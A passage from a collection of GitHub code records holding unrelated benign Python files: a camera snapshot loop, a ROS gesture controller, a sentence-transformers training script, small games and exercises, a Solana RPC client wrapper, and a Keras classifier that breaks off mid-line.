lastSum])\n\t\t\t\t\tshutil.copyfile(pathBaseImage, f\"{pathSnapshots}/{currentTimeFileName()}\")\n\t\t\t\t\tlog(f\"Initiated base image and copied into '{pathSnapshots}' with '{lastSum}'\")\n\t\t\t\t\n\t\t\t\ttry:\n\t\t\t\t\tbaseSum = imgsum(cv2.imread(pathBaseImage, cv2.IMREAD_COLOR), configuration)\n\t\t\t\texcept:\n\t\t\t\t\tlog(\"Failed to get baseSum\")\n\t\t\t\t\tbaseSum = -1\n\n\t\t\t\tif baseSum != configuration['baseSum']:\n\t\t\t\t\tlog(F\"Updating baseSum config value to {baseSum}\")\n\t\t\t\t\tconfigManager.set(['baseSum', int(baseSum)])\n\t\t\t\t\n\t\t\t\tcontinuous = arguments['continuous']\n\t\t\t\tupdateBase = arguments['updateBase']\n\n\t\t\t\tif continuous:\n\t\t\t\t\tlog(\"Entering snapshot loop\")\n\t\t\t\t\tsnapshots(pathSnapshots, camera, True, baseSum = baseSum, configuration = configuration, arguments = arguments, configManager = configManager)\n\n\t\t\t\t\tconfiguration = configManager.process()\n\t\t\t\t\tif configManager.get(['requests', 'reinitialize']):\n\t\t\t\t\t\treinitialize = True\n\t\t\t\telse:\n\t\t\t\t\tif updateBase:\n\t\t\t\t\t\tbenchmark(lambda: snapshots(pathSnapshots, camera, name = \"base\", configuration = configuration, arguments = arguments, configManager = configManager), configManager = configManager)\n\t\t\t\t\telse:\n\t\t\t\t\t\tbenchmark(lambda: snapshots(pathSnapshots, camera, configuration = configuration, arguments = arguments, configManager = configManager), configManager = configManager)\n\t\t\t\n\t\t\texcept:\n\t\t\t\tlog(f\"\\nException info 1: {sys.exc_info()[0]}\\nException info 2: {sys.exc_info()[1]}\\nException traceback: {traceback.print_tb(sys.exc_info()[2])}\")\n\t\t\t\t\n\t\t\tfinally:\n\t\t\t\tcamera.stop_preview()\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tmain()\n\tfinally:\n\t\tlog(\"========== Shutting down ==========\")\n","repo_name":"mikeboharsik/sentry","sub_path":"snapshot_gen/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"29697081890","text":"#!/home/jetson/archiconda3/envs/hand_controller/bin python3.8\nimport cv2\nimport time\nimport os\n\nimport rospy\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom geometry_msgs.msg import Twist\n\nimport HandTrackingModule as htm\nwCam, hCam = 640, 480\n\npTime = 0\ndetector = htm.handDetector(detectionCon=0.75)\ntipIds = [4, 8, 12, 16, 20]\nrospy.init_node('webcam_display', anonymous=True)\ncmd_pub = rospy.Publisher('/cmd_vel',Twist,queue_size=10)\ncmd_msg = Twist()\nwhile not rospy.is_shutdown():\n # print(2)\n msg =rospy.wait_for_message(\"fisheye\", Image, timeout=0.1)\n bridge = CvBridge()\n img = bridge.imgmsg_to_cv2(msg, \"bgr8\")\n # print(3)\n img = detector.findHands(img)\n # print(4)\n lmList = detector.findPosition(img, draw=False)\n # print(lmList)\n if len(lmList) != 0:\n fingers = []\n # Thumb\n if lmList[tipIds[0]][1] > lmList[tipIds[0] - 1][1]:\n fingers.append(1)\n else:\n fingers.append(0)\n # 4 Fingers\n for id in range(1, 5):\n if lmList[tipIds[id]][2] < lmList[tipIds[id] - 2][2]:\n fingers.append(1)\n else:\n fingers.append(0)\n # print(fingers)\n totalFingers = fingers.count(1)\n print(totalFingers)\n if (5-totalFingers) == 0:\n cmd_msg.linear.x = 1\n cmd_msg.angular.z = 0\n cmd_pub.publish(cmd_msg)\n rospy.loginfo(\"message have published x = %0.2f angular z = %0.2f\",cmd_msg.linear.x,cmd_msg.angular.z)\n elif (5-totalFingers) == 1:\n cmd_msg.linear.x = -1\n cmd_msg.angular.z = 0\n cmd_pub.publish(cmd_msg)\n rospy.loginfo(\"message have published x = %0.2f angular z = %0.2f\",cmd_msg.linear.x,cmd_msg.angular.z)\n elif (5-totalFingers) == 2:\n cmd_msg.linear.x = 0\n cmd_msg.angular.z = 0.5\n cmd_pub.publish(cmd_msg)\n rospy.loginfo(\"message have published x = %0.2f angular z = %0.2f\",cmd_msg.linear.x,cmd_msg.angular.z)\n elif (5-totalFingers) == 3:\n cmd_msg.linear.x = 0\n cmd_msg.angular.z = -0.5\n cmd_pub.publish(cmd_msg)\n rospy.loginfo(\"message have published x = %0.2f angular z = %0.2f\",cmd_msg.linear.x,cmd_msg.angular.z)\n else:\n cmd_msg.linear.x = 0\n cmd_msg.angular.z = 0\n cmd_pub.publish(cmd_msg)\n rospy.loginfo(\"message have published x = %0.2f angular z = %0.2f\",cmd_msg.linear.x,cmd_msg.angular.z)\n\n cv2.rectangle(img, (20, 225), (170, 425), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, str(5-totalFingers), (45, 375), cv2.FONT_HERSHEY_PLAIN,\n 10, (255, 0, 0), 25)\n cTime = time.time()\n fps = 1 / (cTime - pTime)\n pTime = cTime\n cv2.putText(img, f'FPS: {int(fps)}', (400, 70), cv2.FONT_HERSHEY_PLAIN,\n 3, (255, 0, 0), 3)\n cv2.imshow(\"Image\", img)\n cv2.waitKey(1)\n","repo_name":"robot-WT/gesture-recognition","sub_path":"image_pub/scripts/FingerCounter.py","file_name":"FingerCounter.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"42804763220","text":"\n#%%\nimport sys,os,gzip,csv,math\nsys.path.insert(0,'..')\nfrom sentence_transformers import models, losses, datasets\nfrom sentence_transformers import LoggingHandler, SentenceTransformer, util, InputExample\nfrom sentence_transformers.evaluation import EmbeddingSimilarityEvaluator,TripletEvaluator,SequentialEvaluator\nimport logging\nfrom datetime import datetime\nfrom eval import process_sts\nfrom data_utils import get_sbert_nli_data,add_to_samples,nli2triplet_sets,transform2triplet_inputexamples,load_all_nli_from_HF,get_HF_nli_dev_test\n\n#### Just some code to print debug information to stdout\nlogging.basicConfig(format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO,\n handlers=[LoggingHandler()])\n\n#%%\ndef prepare_anli_training_examples(data_path='/home/chuang/Dev/DATA/raw_data'):\n # Read the AllNLI.tsv.gz file and create the training dataset\n #Check if dataset exsist. If not, download and extract it\n nli_dataset_path = os.path.join(data_path,'AllNLI.tsv.gz')\n get_sbert_nli_data(nli_dataset_path)\n # read and transform data \n with gzip.open(nli_dataset_path, 'rt', encoding='utf8') as fIn:\n reader = csv.DictReader(fIn, delimiter='\\t', quoting=csv.QUOTE_NONE)\n train_data = nli2triplet_sets(reader,filter_key='split',split='train')\n print('Print one dict item')\n print(next(iter(train_data.items())))\n # transform into triples training examples \n train_samples = transform2triplet_inputexamples(train_data)\n return train_samples\n\ndef prepare_allHFnli_training_examples():\n \n ## load all train split from 2 nli datasets from HF: https://huggingface.co/datasets?sort=downloads&search=nli\n ## anli; snli and multi_nli \n HF_datasets = load_all_nli_from_HF(nli_ds_names=['multi_nli','anli','snli'],split='train')\n ## transform to the same train_data fromat \n train_data = nli2triplet_sets(iter(HF_datasets))\n ## transform to same input examples \n train_samples = transform2triplet_inputexamples(train_data)\n \n return train_samples\n\ndef get_sts_evaluator():\n ## get data and setup evaluator \n sts_samples = process_sts()\n sts_evaluator = EmbeddingSimilarityEvaluator.from_input_examples(\n sts_samples, name='sts_eval',show_progress_bar=True,write_csv=True\n )\n return sts_evaluator\n\ndef get_triplet_loss_evaluator(split_name='dev'):\n sample = get_HF_nli_dev_test(split_name=split_name)\n \n t_evaluator = TripletEvaluator.from_input_examples(\n sample, name=split_name,show_progress_bar=True,write_csv=True\n )\n \n return t_evaluator\ndef maybe_create_dir(fp):\n if os.path.exists(fp):\n pass\n else:\n os.mkdir(fp)\n return fp\n#%%\n\nif __name__ == \"__main__\":\n \n model_name = 'distilroberta-base'\n train_batch_size = 128 #The larger you select this, the better the results (usually). But it requires more GPU memory\n max_seq_length = 75\n num_epochs = 1\n model_save_path = '/home/chuang/Dev/DATA/Model/training_nli_v2_'+model_name.replace(\"/\", \"-\")+'-'+datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n data_path = '/home/chuang/Dev/DATA/raw_data'\n\n ###############################################################\n ## use different functions to loda different training data ####\n ###############################################################\n \n logging.info(\"Read AllNLI train dataset\")\n #train_samples = prepare_anli_training_examples(data_path)\n train_samples = prepare_allHFnli_training_examples()\n logging.info(\"Train samples: {}\".format(len(train_samples)))\n # Special data loader that avoid duplicates within a batch\n train_dataloader = datasets.NoDuplicatesDataLoader(train_samples, batch_size=train_batch_size)\n \n ##############################################################################\n ## setup model; use differenct function for differnt model initialization ####\n ##############################################################################\n # Here we define our SentenceTransformer model\n word_embedding_model = models.Transformer(model_name, max_seq_length=max_seq_length)\n pooling_model = models.Pooling(word_embedding_model.get_word_embedding_dimension(), pooling_mode='mean')\n model = SentenceTransformer(modules=[word_embedding_model, pooling_model])\n\n # Our training loss\n logging.info('User multipleNegativesRankingLoss')\n train_loss = losses.MultipleNegativesRankingLoss(model)\n \n ##########################\n ## setup evaluator ####\n ##########################\n # set up evaluator for sbert : use sementic similary score \n Semetic_similarity_evaluator = get_sts_evaluator()\n # set up evaluator using : use sementic similary score \n Triplet_evaluator_dev = get_triplet_loss_evaluator(split_name='dev')\n Triplet_evaluator_test = get_triplet_loss_evaluator(split_name='test')\n\n Multi_evaluator = SequentialEvaluator([Semetic_similarity_evaluator,Triplet_evaluator_dev],\n main_score_function=lambda x:x) ## report both scores \n ## see https://www.sbert.net/docs/package_reference/evaluation.html#sentence_transformers.evaluation.SequentialEvaluator\n\n#%%\n # Configure the training\n warmup_steps = math.ceil(len(train_dataloader) * num_epochs * 0.01) #1% of train data for warm-up\n logging.info(\"Warmup-steps: {}\".format(warmup_steps))\n\n ## do inital eval before training\n maybe_create_dir(model_save_path)\n Multi_evaluator(model,model_save_path)\n\n #%%\n # Train the model\n model.fit(train_objectives=[(train_dataloader, train_loss)],\n optimizer_params = {'lr': 2e-5},\n scheduler='WarmupLinear',\n evaluator=Triplet_evaluator_dev,\n epochs=num_epochs,\n evaluation_steps=int(len(train_dataloader)*0.05),\n #checkpoint_save_steps = int(len(train_dataloader)*0.05)\n warmup_steps=warmup_steps,\n output_path=model_save_path,\n use_amp=False #Set to True, if your GPU supports FP16 operations\n )\n\n\n","repo_name":"johnsonice/HuggingFace_Demos","sub_path":"examples/sentence_bert_applications/task_specific_training/train_nli.py","file_name":"train_nli.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"16314366742","text":"from art import logo\nimport random\n\nEASY_LEVEL_TURNS = 10\nHARD_LEVEL_TURNS = 5\n\ndef set_difficulty():\n level = input(\"Choose your difficulty. Type 'easy' or 'hard': \")\n if level == 'easy':\n return EASY_LEVEL_TURNS\n elif level == 'hard':\n return HARD_LEVEL_TURNS\n\ndef check_answer(answer, number, turns):\n if answer > number:\n print(\"Too High\")\n return turns - 1\n if answer < number:\n print(\"Too Low\")\n return turns - 1\n if answer == number:\n print(f\"You got it! The answer was {answer}\")\n return turns\n\ndef game():\n\n print(\"Welcome to the Number Guessing Games!\")\n print(\"I'm thinking of a number between 1 and 100.\")\n chosen_number = random.randint(1, 100)\n\n turns = set_difficulty()\n\n guess = 0\n while guess != chosen_number:\n print(f\"You have {turns} attempts remaining to guess the number.\")\n\n guess = int(input(\"Make a guess: \"))\n turns = check_answer(guess, chosen_number, turns)\n\n if turns == 0:\n print(\"You've run out of guesses. You lose\")\n return print(f\"The correct answer was {chosen_number}.\")\n elif guess!= chosen_number:\n print(\"Guess again.\")\n\n\nprint(logo)\ngame()","repo_name":"CheddarP/The-Number-Game","sub_path":"numbergame.py","file_name":"numbergame.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7791440803","text":"from google.cloud import translate_v2 as translate\ntranslate_client = translate.Client()\n\n\nsource = open(\"emoji_utf8_lexicon.txt\", 'r')\noutput = open(\"emoji.txt\", 'w')\n\nfor line in source.readlines():\n #print(\"line[0] ->\" + line.split('\\t')[0] + \"\\nline[1] ->\" + line.split('\\t')[1].strip() + \"\\n\")\n #output_line = line.split('\\t')[0] + \"\\t\" + line.split('\\t')[1].strip() + \"\\n\"\n #print(output_line)\n result = translate_client.translate(\n line.split('\\t')[1].strip(), target_language='pl')\n #print(result)\n if result['detectedSourceLanguage'] == 'en':\n output_line = line.split('\\t')[0].strip() + \"\\t\" + result['translatedText'].strip() + \"\\n\"\n else:\n output_line = line\n print(line + output_line)\n output.write(output_line)\n\n","repo_name":"kswierad/PolishVader","sub_path":"vaderSentiment/translate_emoji.py","file_name":"translate_emoji.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33380307871","text":"from Lib import LIB\nfrom POM.BDG_Home import Home\n\n'''\n1. Go to URL\n2. Click to Our Trainers\n4. Check Trainers page titile\n5. Check Trainers page url\n6. Check Trainers page letters\n7. Close browser\n'''\n\ndef test_1():\n try:\n\n #open browser\n obj_lib = LIB()\n browser = obj_lib.open_browser()\n\n #create objects\n obj_home = Home(browser)\n\n #steps\n obj_lib.page_load(browser)\n obj_lib.wait_for_element(browser, obj_home.our_trainers).click()\n assert browser.title == obj_lib.get_data(\"our_trainers_page_title\")\n assert browser.current_url == obj_lib.get_data( \"our_trainers_page_url\")\n assert obj_lib.get_data(\"our_trainers_page_letter\") in browser.page_source\n\n except Exception as exp:\n obj_lib.write_to_file(f\"In case 5, error reason is -{exp}\")\n obj_lib.save_screenshot(browser, \"Case_5\")\n raise exp\n\n finally:\n # Close browser\n obj_lib.close_browser(browser)\n\n","repo_name":"Margar1999/BDG_website_testing","sub_path":"Test/test_Case_5_Check_Trainers_page_letters.py","file_name":"test_Case_5_Check_Trainers_page_letters.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27207844631","text":"import logging\nimport random\nimport signal\nimport time\nfrom contextlib import contextmanager\nfrom typing import Optional, Union\n\nfrom solana.keypair import Keypair\nfrom solana.publickey import PublicKey\nfrom solana.rpc.api import Client, Commitment\nfrom solana.rpc.types import TokenAccountOpts\nfrom src.exceptions import UnsupportedVersionError\nfrom src.solana.solana_helpers import SPL_TOKEN_ID_PK\nfrom src.solana.solana_transaction_types import (\n ConfirmedSignatureForAddressResponse,\n ConfirmedTransaction,\n)\n\nlogger = logging.getLogger(__name__)\n\n# maximum number of times to retry get_confirmed_transaction call\nDEFAULT_MAX_RETRIES = 5\n# number of seconds to wait between calls to get_confirmed_transaction\nDELAY_SECONDS = 0.2\nUNSUPPORTED_VERSION_ERROR_CODE = -32015\n\n\nclass SolanaClientManager:\n def __init__(self, solana_endpoints) -> None:\n self.endpoints = solana_endpoints.split(\",\")\n self.clients = [Client(endpoint) for endpoint in self.endpoints]\n\n def get_client(self, randomize=False) -> Client:\n if not self.clients:\n raise Exception(\n \"solana_client_manager.py | get_client | There are no solana clients\"\n )\n if not randomize:\n return self.clients[0]\n index = random.randrange(0, len(self.clients))\n return self.clients[index]\n\n def get_sol_tx_info(\n self, tx_sig: str, retries=DEFAULT_MAX_RETRIES, encoding=\"json\"\n ):\n \"\"\"Fetches a solana transaction by signature with retries and a delay.\"\"\"\n\n def handle_get_sol_tx_info(client: Client, index: int):\n endpoint = self.endpoints[index]\n num_retries = retries\n while num_retries > 0:\n try:\n tx_info: ConfirmedTransaction = client.get_transaction(\n tx_sig, encoding\n )\n _check_error(tx_info, tx_sig)\n if tx_info[\"result\"] is not None:\n return tx_info\n # We currently only support \"legacy\" solana transactions. If we encounter\n # a newer version, raise this specific error so that it can be handled upstream.\n except UnsupportedVersionError as e:\n raise e\n except Exception as e:\n logger.error(\n f\"solana_client_manager.py | get_sol_tx_info | \\\n Error fetching tx {tx_sig} from endpoint {endpoint}, {e}\",\n exc_info=True,\n )\n num_retries -= 1\n time.sleep(DELAY_SECONDS)\n logger.error(\n f\"solana_client_manager.py | get_sol_tx_info | Retrying tx fetch: {tx_sig} with endpoint {endpoint}\"\n )\n raise Exception(\n f\"solana_client_manager.py | get_sol_tx_info | Failed to fetch {tx_sig} with endpoint {endpoint}\"\n )\n\n return _try_all(\n self.clients,\n handle_get_sol_tx_info,\n f\"solana_client_manager.py | get_sol_tx_info | All requests failed to fetch {tx_sig}\",\n )\n\n def get_signatures_for_address(\n self,\n account: Union[str, Keypair, PublicKey],\n before: Optional[str] = None,\n until: Optional[str] = None,\n limit: Optional[int] = None,\n retries: int = DEFAULT_MAX_RETRIES,\n ):\n \"\"\"Fetches confirmed signatures for transactions given an address.\"\"\"\n\n def handle_get_signatures_for_address(client: Client, index: int):\n endpoint = self.endpoints[index]\n num_retries = retries\n while num_retries > 0:\n try:\n transactions: ConfirmedSignatureForAddressResponse = (\n client.get_signatures_for_address(\n account, before, until, limit, Commitment(\"finalized\")\n )\n )\n return transactions\n except Exception as e:\n logger.error(\n f\"solana_client_manager.py | handle_get_signatures_for_address | \\\n Error fetching account {account} from endpoint {endpoint}, {e}\",\n exc_info=True,\n )\n num_retries -= 1\n time.sleep(DELAY_SECONDS)\n logger.error(\n f\"solana_client_manager.py | handle_get_signatures_for_address | Retrying account fetch: {account} with endpoint {endpoint}\"\n )\n raise Exception(\n f\"solana_client_manager.py | handle_get_signatures_for_address | Failed to fetch account {account} with endpoint {endpoint}\"\n )\n\n return _try_all_with_timeout(\n self.clients,\n handle_get_signatures_for_address,\n \"solana_client_manager.py | get_signatures_for_address | All requests failed\",\n )\n\n def get_slot(self, retries=DEFAULT_MAX_RETRIES, encoding=\"json\") -> Optional[int]:\n def _get_slot(client: Client, index):\n endpoint = self.endpoints[index]\n num_retries = retries\n while num_retries > 0:\n try:\n response = client.get_slot(Commitment(\"finalized\"))\n return response[\"result\"]\n except Exception as e:\n logger.error(\n f\"solana_client_manager.py | get_slot, {e}\",\n exc_info=True,\n )\n num_retries -= 1\n time.sleep(DELAY_SECONDS)\n logger.error(\n f\"solana_client_manager.py | get_slot | Retrying with endpoint {endpoint}\"\n )\n raise Exception(\n f\"solana_client_manager.py | get_slot | Failed with endpoint {endpoint}\"\n )\n\n return _try_all(\n self.clients,\n _get_slot,\n \"solana_client_manager.py | get_slot | All requests failed to fetch\",\n )\n\n def get_token_accounts_by_owner(\n self, owner: PublicKey, retries=DEFAULT_MAX_RETRIES\n ):\n def _get_token_accounts_by_owner(client: Client, index):\n endpoint = self.endpoints[index]\n num_retries = retries\n while num_retries > 0:\n try:\n response = client.get_token_accounts_by_owner(\n owner,\n TokenAccountOpts(\n program_id=SPL_TOKEN_ID_PK, encoding=\"jsonParsed\"\n ),\n )\n return response[\"result\"]\n except Exception as e:\n logger.error(\n f\"solana_client_manager.py | get_token_accounts_by_owner, {e}\",\n exc_info=True,\n )\n num_retries -= 1\n time.sleep(DELAY_SECONDS)\n logger.error(\n f\"solana_client_manager.py | get_token_accounts_by_owner | Retrying with endpoint {endpoint}\"\n )\n raise Exception(\n f\"solana_client_manager.py | get_token_accounts_by_owner | Failed with endpoint {endpoint}\"\n )\n\n return _try_all(\n self.clients,\n _get_token_accounts_by_owner,\n \"solana_client_manager.py | get_token_accounts_by_owner | All requests failed to fetch\",\n )\n\n def get_account_info(self, account: PublicKey, retries=DEFAULT_MAX_RETRIES):\n def _get_account_info(client: Client, index):\n endpoint = self.endpoints[index]\n num_retries = retries\n while num_retries > 0:\n try:\n response = client.get_account_info(account)\n return response[\"result\"]\n except Exception as e:\n logger.error(\n f\"solana_client_manager.py | get_account_info, {e}\",\n exc_info=True,\n )\n num_retries -= 1\n time.sleep(DELAY_SECONDS)\n logger.error(\n f\"solana_client_manager.py | get_account_info | Retrying with endpoint {endpoint}\"\n )\n raise Exception(\n f\"solana_client_manager.py | get_account_info | Failed with endpoint {endpoint}\"\n )\n\n return _try_all(\n self.clients,\n _get_account_info,\n \"solana_client_manager.py | get_account_info | All requests failed to fetch\",\n )\n\n\n@contextmanager\ndef timeout(time):\n # Register a function to raise a TimeoutError on the signal.\n signal.signal(signal.SIGALRM, raise_timeout)\n # Schedule the signal to be sent after ``time``.\n signal.alarm(time)\n\n try:\n yield\n except TimeoutError: # pylint: disable=W0706\n raise\n finally:\n # Unregister the signal so it won't be triggered\n # if the timeout is not reached.\n signal.signal(signal.SIGALRM, signal.SIG_IGN)\n\n\ndef raise_timeout(signum, frame):\n raise TimeoutError\n\n\ndef _check_error(tx, tx_sig):\n if \"error\" in tx:\n logger.error(\n f\"solana_client_manager.py | _check_unsupported_version | Transaction {tx_sig} version is unsupported\"\n )\n raise UnsupportedVersionError()\n\n\ndef _try_all(iterable, func, message, randomize=False):\n \"\"\"Executes a function with retries across the iterable.\n If all executions fail, raise an exception.\"\"\"\n items = list(enumerate(iterable))\n items = items if not randomize else random.sample(items, k=len(items))\n for index, value in items:\n try:\n return func(value, index)\n except UnsupportedVersionError as e:\n raise e\n except Exception:\n logger.error(\n f\"solana_client_manager.py | _try_all | Failed attempt at index {index} for function {func}\"\n )\n if index < len(items) - 1:\n logger.info(\"solana_client_manager.py | _try_all | Retrying\")\n continue\n raise Exception(message)\n\n\ndef _try_all_with_timeout(iterable, func, message, randomize=False):\n \"\"\"Do not use this function with ThreadPoolExecutor,\n doesn't play well with futures\n\n Executes a function with retries across the iterable.\n If all executions fail, raise an exception.\"\"\"\n items = list(enumerate(iterable))\n items = items if not randomize else random.sample(items, k=len(items))\n for index, value in items:\n try:\n with timeout(30):\n return func(value, index)\n except Exception:\n logger.error(\n f\"solana_client_manager.py | _try_all | Failed attempt at index {index} for function {func}\"\n )\n if index < len(items) - 1:\n logger.info(\"solana_client_manager.py | _try_all | Retrying\")\n continue\n raise Exception(message)\n","repo_name":"chinmaisiddhartha/audius-main","sub_path":"discovery-provider/src/solana/solana_client_manager.py","file_name":"solana_client_manager.py","file_ext":"py","file_size_in_byte":11094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13260525411","text":"def pay(wage, hours):\n '''\n (Number, Number) -> Number\n Calculates employees pay (includes overtime)\n Precondition: wage and hours are positive integers\n '''\n\n if hours <= 40:\n return hours*wage\n if(40 < hours <= 60):\n return 40 * wage + (hours-40) * wage*1.5\n if(hours > 60):\n regular = 40*wage\n overtime = 20*wage*1.5\n superovertime = (hours-60)*wage*2\n print(regular, overtime, superovertime)\n return regular + overtime + superovertime\n\n\ndef rps(player1, player2):\n '''(string, string) -> Number\n Returns 0 if player1 and player2 tied, -1 if player1 won, and 1 if player2 won in the game of rock paper scissors\n Precondition: both paramaters is one of the following strings (R,S,P)\n '''\n if(player1 == player2):\n return 0\n if(player1 == 'R' and player2 == 'S' or player1 == 'S' and player2 == 'P' or player1 == 'P' and player2 == 'R'):\n return -1\n return 1\n\n\ndef is_divisible(n, m):\n '''(number, number) -> boolean\n Returns True if paramater1 is divisible by paramater2 and false if it's not\n Precondition: paramater1 and paramater2 are both integers\n '''\n return n % m == 0\n\n\ndef is_divisible23n8(value):\n '''(number) -> string\n Returns yes if the paramater is divisible by 3 and 2 but not 8 (if the opposite it returns \"no\")\n Precondition: the paramater is an integer\n '''\n if(is_divisible(value, 3) and is_divisible(value, 2) and not(is_divisible(value, 8))):\n return \"yes\"\n return \"no\"\n\n\ndef a3():\n n = input(\"Enter 1st integer: \")\n m = input(\"Enter 2nd integer: \")\n if(is_divisible(int(n), int(m))):\n print(n + \" is divisible by \" + m)\n else:\n print(n + \" is not divisible by \" + m)\n\n\ndef b3():\n n = input(\"Enter an integer: \")\n if(is_divisible23n8(int(n)) == \"yes\"):\n print(n + \" is divisible by 2 or 3 but no 8\")\n else:\n print(\"It is not true that \" + n + \" is divisible by 2 or 3 but no 8\")\n\n\nif __name__ == \"__main__\":\n # a3()\n b3()\n","repo_name":"AdamJSoftware/iti1120","sub_path":"lab3/q0.py","file_name":"q0.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11821625702","text":"#Find the sum of all the primes below two million.\r\n\r\ndef primes_Lthan(n):\r\n #Making sure n is an integer\r\n n = int(n)\r\n #Generating a list of odd intergers to save time\r\n check = list(range(3, n + 1, 2))\r\n #As a result of the line above we gotta manually add 2 as a prime\r\n primes = [2]\r\n #x is going to be our index for the next part\r\n x = 0\r\n\r\n\r\n #Debug code:\r\n #print( )\r\n #print(\"range in question is 0 to \",check[-1])\r\n #print()\r\n #print(\"checking: \", check)\r\n #print()\r\n\r\n #The plan is to remove every prime once we've found it and every non-prime\r\n # from the list of values we're checking so eventually the list of values\r\n # we're checking will be empty\r\n while not check == []:\r\n\r\n #I guess we didn't need to set x above, since we'll need it back at 0\r\n # everytime we're done combing through the list for non-primes\r\n x = 0\r\n\r\n #p is least in the number to check\r\n p = check[0]\r\n #and p is also prime\r\n primes.append(p)\r\n #the part where we remove the prime once we've catalogued it\r\n del check[0]\r\n\r\n #while loop used to do the combing, once x == len(check) - 1 we've reached\r\n # the last element in the list and so the first element in the list will\r\n # be prime so we go back to beginning and catalogue it\r\n while x < len(check):\r\n\r\n if check[x] % p == 0:\r\n del check[x]\r\n\r\n x += 1\r\n\r\n #Debug code:\r\n #print(x)\r\n #print(\"primes found, \",len(primes))\r\n\r\n return primes\r\n\r\nall = primes_Lthan(2000000)\r\n\r\n#Debug code:\r\n#print()\r\n#print(\"last prime found: \", all[-1])\r\n#print()\r\n#print(all)\r\n#print()\r\n\r\n#Some set-up for the next part\r\ntotal = 0\r\na = 0\r\n\r\n#Recursive loop for adding things together, another way to do this would be to\r\n# add the first value in all to total then delete it, that way you wouldn't have\r\n# to code the increasing index\r\nwhile a < len(all):\r\n\r\n total = all[a] + total\r\n a += 1\r\n\r\n #Debug code:\r\n #print(total)\r\n\r\nprint( )\r\nprint(\"the sum you're looking for is: \",total)\r\nprint( )\r\n\r\n#Run this and go get lunch or something\r\n","repo_name":"jackmitcheltree/Project_Euler_JM","sub_path":"problem_10.py","file_name":"problem_10.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"3948547035","text":"import glob\r\nfrom random import shuffle\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport tensorflow_hub as hub\r\nfrom tensorflow.keras import layers\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\r\nfrom tensorflow.keras.layers import Activation, Dropout, Flatten, Dense\r\nfrom tensorflow.keras.applications.mobilenet import preprocess_input\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator, load_img, img_to_array, array_to_img\r\nfrom tensorflow.keras import optimizers\r\n\r\n\r\ndef getLabel(filePaths):\r\n\tlabels = []\r\n\tfor img in filePaths:\r\n\t\tif 'Healthy' in img:\r\n\t\t\tlabels.append(0)\r\n\t\telif 'defects' in img:\r\n\t\t\tlabels.append(1)\r\n\r\n\tdataZip = list(zip(filePaths, labels))\r\n\tshuffle(dataZip)\r\n\tfilePaths, labels = zip(*dataZip)\r\n\treturn filePaths, labels\r\n\r\n\r\ndef split_trainTest(imgsAll, labelAll, splitRatio = 0.25):\r\n\tdataZip = list(zip(imgsAll, labelAll))\r\n\tshuffle(dataZip)\r\n\timgsAll, labelAll = zip(*dataZip)\r\n\tsplitPoint = int(len(imgsAll)*splitRatio)\r\n\r\n\ttrainImgs = imgsAll[:int(len(imgsAll) - splitPoint)]\r\n\ttrainLabel = labelAll[:int(len(imgsAll) - splitPoint)]\r\n\ttestImgs = imgsAll[int(len(imgsAll)-splitPoint):]\r\n\ttestLabel = labelAll[int(len(imgsAll)-splitPoint):]\r\n\r\n\treturn trainImgs, testImgs, trainLabel, testLabel\r\n\r\nimages, labels = getLabel(glob.glob('C:\\\\Users\\\\sbhure\\\\Desktop\\\\JBM\\\\JBMClassification2\\\\*\\\\*.jpg'))\r\n# split the images into train and test sets.\r\nX_train, X_test, y_train, y_test = split_trainTest(images, labels, splitRatio=0.25)\r\ndisplay(print(f'SHape of training dataset {len(X_train)} and shape of validation set is {len(X_test)}'))\r\n\r\nIMAGE_SIZE = (224, 224)\r\n\r\ntrain_imgs = [img_to_array(load_img(img, target_size=IMAGE_SIZE)) for img in X_train]\r\ntrain_imgs = np.array(train_imgs)\r\ntrain_labels = list(y_train)\r\nvalidation_imgs = [img_to_array(load_img(img, target_size=IMAGE_SIZE)) for img in X_test]\r\nvalidation_imgs = np.array(validation_imgs)\r\nvalidation_labels = list(y_test)\r\n# Scale the images as Deep learning models tend to work good with smaller input\r\n\r\nprint('Train dataset shape:', train_imgs.shape, \r\n '\\tValidation dataset shape:', validation_imgs.shape)\r\ntrain_imgs_scaled = train_imgs.astype('float32')\r\nvalidation_imgs_scaled = validation_imgs.astype('float32')\r\ntrain_imgs_scaled /= 255\r\nvalidation_imgs_scaled /= 255\r\n\r\nbatch_size = 32\r\nnum_classes = 2\r\nepochs = 30\r\ninput_shape = (224, 224, 3)\r\nimg_width, img_height = 224, 224\r\n\r\n# train_datagen = ImageDataGenerator(rescale=1./255, zoom_range=0.3, rotation_range=50,\r\n# width_shift_range=0.2, height_shift_range=0.2, shear_range=0.2, \r\n# horizontal_flip=True, fill_mode='nearest')\r\n\r\ntrain_datagen = 